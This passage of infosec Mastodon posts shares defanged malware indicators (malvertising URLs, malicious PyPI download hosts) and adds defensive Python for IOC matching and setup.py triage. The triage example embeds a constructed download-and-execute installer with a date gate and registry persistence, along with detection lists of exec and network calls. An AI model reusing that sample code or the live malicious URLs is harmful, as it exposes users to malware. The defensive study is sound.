class="invisible">5190b44da96e5ecb5f39e2cbe3713984dc8062cdab679c759de51500b1/details</span></a></p><p><a href="https://infosec.exchange/tags/malvertising" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malvertising</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" 
rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a></p>
AndiMann<p>QQ for my <a href="https://masto.ai/tags/ITOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ITOps</span></a> crew:</p><p>What is the best <a href="https://masto.ai/tags/conference" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>conference</span></a>, <a href="https://masto.ai/tags/event" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>event</span></a>, <a href="https://masto.ai/tags/tradeshow" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tradeshow</span></a> to learn about <a href="https://masto.ai/tags/CloudOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CloudOps</span></a>, <a href="https://masto.ai/tags/AIOps" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>AIOps</span></a>, <a href="https://masto.ai/tags/Observability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Observability</span></a>, <a href="https://masto.ai/tags/SRE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>SRE</span></a>, <a href="https://masto.ai/tags/PlatformEngineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PlatformEngineering</span></a>, <a href="https://masto.ai/tags/devOPS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>devOPS</span></a>, <a href="https://masto.ai/tags/reliability" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>reliability</span></a> engineering, and other modern <a href="https://masto.ai/tags/CloudNative" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CloudNative</span></a> approaches for <a href="https://masto.ai/tags/IT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IT</span></a> Ops?</p><p><a 
href="https://masto.ai/tags/Reinvent" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Reinvent</span></a>, <a href="https://masto.ai/tags/IOCS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCS</span></a>, <a href="https://masto.ai/tags/DevOpsDays" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>DevOpsDays</span></a> ... and?</p>
The Spamhaus Project<p>This month StealC 🔝 tops the charts for malware families associated with malware sites at 4,577 samples shared on URLHaus. Meanwhile Cobalt Strike remains #1 for IOCs shared - find out which malware are in the Top10 at the links below:</p><p>ThreatFox | IOCs shared:<br>👉 <a href="https://www.spamhaus.org/malware-digest/#threatfox" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#t</span><span class="invisible">hreatfox</span></a></p><p>URLHaus | Malware sites:<br>👉 <a href="https://www.spamhaus.org/malware-digest/#urlhaus" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#u</span><span class="invisible">rlhaus</span></a></p><p>All the data in the Malware Digest is provided by <span class="h-card" translate="no"><a href="https://ioc.exchange/@abuse_ch" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>abuse_ch</span></a></span>'s community driven open platforms.</p><p><a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> <a href="https://infosec.exchange/tags/CobaltStrike" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CobaltStrike</span></a> <a href="https://infosec.exchange/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://infosec.exchange/tags/abuseCH" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>abuseCH</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow 
noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a></p>
Colin Cowie<p>WinSCP is a popular target for malware campaigns abusing Google ads. Here's one from this morning:</p><p>1. Google search for winscp<br>2. Click the first link, user redirection<br>➡️​ winscp-eng[.]org<br>➡️​ winscp-static-746341.c.cdn77[.]org<br>3. Button click, malware download<br>➡️​ https[:]//parsecworks[.]org/us/downloads/WinSCP-6.1.2-Setup.exe </p><p><a href="https://www.virustotal.com/gui/file/b503e810b31151f8d79bc0db2b46daddc53f27a2fd741c30355726892591e5b3/detection" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">virustotal.com/gui/file/b503e8</span><span class="invisible">10b31151f8d79bc0db2b46daddc53f27a2fd741c30355726892591e5b3/detection</span></a></p><p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/malvertising" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malvertising</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
Nnubes256<p>Hello infosec.exchange! Here's an <a href="https://infosec.exchange/tags/introduction" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>introduction</span></a>. I am currently an <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> student in <a href="https://infosec.exchange/tags/europe" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>europe</span></a> starting research on <a href="https://infosec.exchange/tags/obd2" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>obd2</span></a> dongles, but sometimes I also do <a href="https://infosec.exchange/tags/threathunting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threathunting</span></a>, <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>reverseengineering</span></a> and <a href="https://infosec.exchange/tags/ctf" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ctf</span></a> for the thrill.</p><p>I wanna use this account to talk and ask questions to the wider community. I may also share <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> of ongoing campaigns from time to time. I also have a main account (<span class="h-card" translate="no"><a href="https://mas.to/@Nnubes256" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>Nnubes256@mas.to</span></a></span>) for more general stuff; I'm just moving my <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> presence where the action is :D</p>
Jérôme Segura<p><a href="https://infosec.exchange/tags/FakeSG" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FakeSG</span></a>/#RogueRaticate leading to <a href="https://infosec.exchange/tags/netsupportrat" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>netsupportrat</span></a> </p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/58/downloading-(114.0.522735.199%20(Official%20Build).url</p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/57/consciousnessx.hta</p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/56/housealba.zip</p><p>ebodyfit[.]com/wp-content/uploads/ultimatemember/56/clients32.exe</p><p><a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a></p>
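<p>The two posts above (Colin Cowie's WinSCP malvertising chain and Jérôme Segura's FakeSG list) share their indicators defanged with <code>[.]</code> and <code>[:]</code>, which is how IOCs usually arrive from social feeds. The following is an added example, not code from either post, showing how to refang those exact indicators and sweep them against web-proxy logs; the log lines are constructed for the demo and the Squid-style column layout is an assumption about your proxy format.</p>

```python
"""Refang defanged IOCs from threat-intel posts and match them against proxy logs.

Added example, not code from any of the quoted posts. The indicator values are
the ones listed in the posts above; the log lines are constructed for the demo.
"""
import hashlib
import re
from urllib.parse import urlsplit

# Defanged indicators exactly as shared in the posts above.
RAW_IOCS = [
    "winscp-eng[.]org",
    "winscp-static-746341.c.cdn77[.]org",
    "https[:]//parsecworks[.]org/us/downloads/WinSCP-6.1.2-Setup.exe",
    "ebodyfit[.]com/wp-content/uploads/ultimatemember/58/downloading-(114.0.522735.199%20(Official%20Build).url",
    "ebodyfit[.]com/wp-content/uploads/ultimatemember/57/consciousnessx.hta",
    "ebodyfit[.]com/wp-content/uploads/ultimatemember/56/housealba.zip",
    "ebodyfit[.]com/wp-content/uploads/ultimatemember/56/clients32.exe",
]
# SHA-256 taken from the VirusTotal link in the WinSCP post above.
KNOWN_BAD_SHA256 = {
    "b503e810b31151f8d79bc0db2b46daddc53f27a2fd741c30355726892591e5b3",
}


def refang(ioc: str) -> str:
    """Undo common defanging: [.] / (.) -> '.', [:] -> ':', hxxp -> http."""
    s = ioc.strip()
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s


def host_of(ioc: str) -> str:
    """Hostname of a refanged URL, scheme-less URL, or bare domain."""
    s = refang(ioc)
    if "://" not in s:
        s = "http://" + s
    return urlsplit(s).hostname.lower()


BAD_HOSTS = {host_of(i) for i in RAW_IOCS}

# Constructed Squid-style access log lines (not real traffic):
# timestamp elapsed client action/code bytes method URL ...
SAMPLE_LOG = """\
1711440000.123 532 10.0.0.15 TCP_MISS/200 4213 GET https://www.google.com/search?q=winscp - HIER_DIRECT/142.250.80.36 text/html
1711440002.456 201 10.0.0.15 TCP_MISS/302 512 GET https://winscp-eng.org/ - HIER_DIRECT/203.0.113.10 text/html
1711440003.789 198 10.0.0.15 TCP_MISS/200 9087 GET https://winscp-static-746341.c.cdn77.org/index.html - HIER_DIRECT/203.0.113.11 text/html
1711440010.001 1450 10.0.0.15 TCP_MISS/200 7340032 GET https://parsecworks.org/us/downloads/WinSCP-6.1.2-Setup.exe - HIER_DIRECT/203.0.113.12 application/octet-stream
1711440020.002 120 10.0.0.22 TCP_MISS/200 3311 GET https://winscp.net/eng/download.php - HIER_DIRECT/198.51.100.5 text/html
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+(?P<src>\S+)\s+\S+\s+\S+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def match_log(log_text: str) -> list[dict]:
    """Return one hit per log line whose request host is in BAD_HOSTS."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host = urlsplit(m["url"]).hostname
        if host and host.lower() in BAD_HOSTS:
            hits.append({"ts": m["ts"], "src": m["src"], "host": host.lower(), "url": m["url"]})
    return hits


def sha256_is_known_bad(data: bytes) -> bool:
    """Check a downloaded file's bytes against the hash indicators."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256


if __name__ == "__main__":
    for h in match_log(SAMPLE_LOG):
        print(h)
```

<p>Matching on the hostname rather than the full URL catches the redirect hops (the first two domains in the WinSCP chain never serve the payload themselves), while the legitimate winscp.net request in the sample stays clean. Refang only at the point of use and keep the stored indicator defanged, so a copy of the feed cannot be clicked by accident.</p>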
dubbel<p>Reported malicious python package "colors5", downloading an executable on setup from<br>https://resetname.peanutgamerdot.repl[.]co/Built.exe</p><p>It's the best documented malicious package I've seen, with helpful comments like</p><p># write the malware to a file<br># attempt to add a windows defender exclusion if the person runs our batch as admin<br># run the malware</p><p>The only attempt at evasion is the screen-full of newlines before this code. :blob_confused: </p><p><a href="https://mstdn.io/tags/python" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>python</span></a> <a href="https://mstdn.io/tags/PyPI" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PyPI</span></a> <a href="https://mstdn.io/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://mstdn.io/tags/IoCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IoCs</span></a> <a href="https://mstdn.io/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a></p>
dubbel<p>Just when I had figured out what the malicious python package "urllib33" did and wanted to report it, I noticed that it was already removed - great work by somebody! (&lt;90min!)</p><p>This society critic downloads an exe from https://fucksociety.8443[.]ml/download/setup.exe - but only starting tomorrow. First time I see this technique on pypi, that aims to evade the initial scans. It also uses the Windows Registry - maybe for persistence?</p><p><a href="https://mstdn.io/tags/Python" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Python</span></a> <a href="https://mstdn.io/tags/PyPI" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>PyPI</span></a> <a href="https://mstdn.io/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://mstdn.io/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://mstdn.io/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
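<p>Both of dubbel's posts above describe the same PyPI pattern: a <code>setup.py</code> that downloads and runs an executable at install time, in the second case only after a future date so that upload-time scanners see nothing. The following is an added example, not code from either reported package, that statically triages a <code>setup.py</code> with Python's <code>ast</code> module for install-time network calls, process execution, registry access and date-gated code paths. The <code>SAMPLE_SETUP_PY</code> string is a constructed stand-in for the behaviour described; its URL, date and package name are placeholders, not the real indicators.</p>

```python
"""Static triage of a PyPI package's setup.py for install-time download-and-execute
behaviour, including the delayed-activation (date-gate) trick described above.

Added example, not code from the reported packages. SAMPLE_SETUP_PY is a
constructed stand-in; the URL, date and package name are placeholders.
"""
import ast
from dataclasses import dataclass

SAMPLE_SETUP_PY = '''
from setuptools import setup
import datetime, os, urllib.request, winreg

def _payload():
    # "only starting tomorrow": sleep past the scanners that run at upload time
    if datetime.date.today() < datetime.date(2099, 1, 1):   # placeholder date
        return
    data = urllib.request.urlopen("https://example.invalid/setup.exe").read()  # placeholder URL
    path = os.path.join(os.environ["TEMP"], "setup.exe")
    open(path, "wb").write(data)
    os.system(path)
    key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run")
    winreg.SetValueEx(key, "Updater", 0, winreg.REG_SZ, path)

_payload()
setup(name="example-pkg", version="1.0.0")
'''

# (module, attribute) pairs that have no business in an install script.
NETWORK_CALLS = {("urllib.request", "urlopen"), ("requests", "get"), ("requests", "post")}
EXEC_CALLS = {("os", "system"), ("os", "startfile"), ("subprocess", "run"),
              ("subprocess", "Popen"), ("subprocess", "call")}
REGISTRY_MODULES = {"winreg", "_winreg"}
TIME_ATTRS = {"today", "now", "time"}


@dataclass
class Finding:
    kind: str
    line: int
    detail: str


def _dotted(node: ast.AST) -> str:
    """Render ast.Name/ast.Attribute chains as 'a.b.c'; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage_setup_py(source: str) -> list[Finding]:
    """Walk the AST and report network, exec, registry and date-gate indicators."""
    tree = ast.parse(source)
    findings: list[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for n in names:
                if n.split(".")[0] in REGISTRY_MODULES:
                    findings.append(Finding("registry", node.lineno, f"imports {n}"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            mod, _, attr = name.rpartition(".")
            if (mod, attr) in NETWORK_CALLS:
                findings.append(Finding("network", node.lineno, name))
            elif (mod, attr) in EXEC_CALLS:
                findings.append(Finding("exec", node.lineno, name))
        elif isinstance(node, ast.Compare):
            # A comparison whose operand is a today()/now()/time() call is the
            # delayed-activation pattern: the real behaviour is gated on the clock.
            operands = [node.left, *node.comparators]
            if any(isinstance(o, ast.Call) and _dotted(o.func).rpartition(".")[2] in TIME_ATTRS
                   for o in operands):
                findings.append(Finding("time-gate", node.lineno, "date comparison guards a code path"))
    return findings


def is_suspicious(source: str) -> bool:
    """Download plus execution in an install script is the minimum to block on."""
    kinds = {f.kind for f in triage_setup_py(source)}
    return "network" in kinds and "exec" in kinds


if __name__ == "__main__":
    for f in triage_setup_py(SAMPLE_SETUP_PY):
        print(f"{f.kind:10} line {f.line}: {f.detail}")
    print("suspicious:", is_suspicious(SAMPLE_SETUP_PY))
```

<p>Static inspection is the point here: a sandbox that runs <code>pip install</code> on the day of upload would see the date-gated sample do nothing, which is exactly the evasion the second post describes. The heuristics are deliberately narrow (exact module/attribute pairs), so an <code>exec(base64...)</code> blob or a renamed import would need additional rules; the newline padding mentioned in the first post is irrelevant to an AST walk.</p>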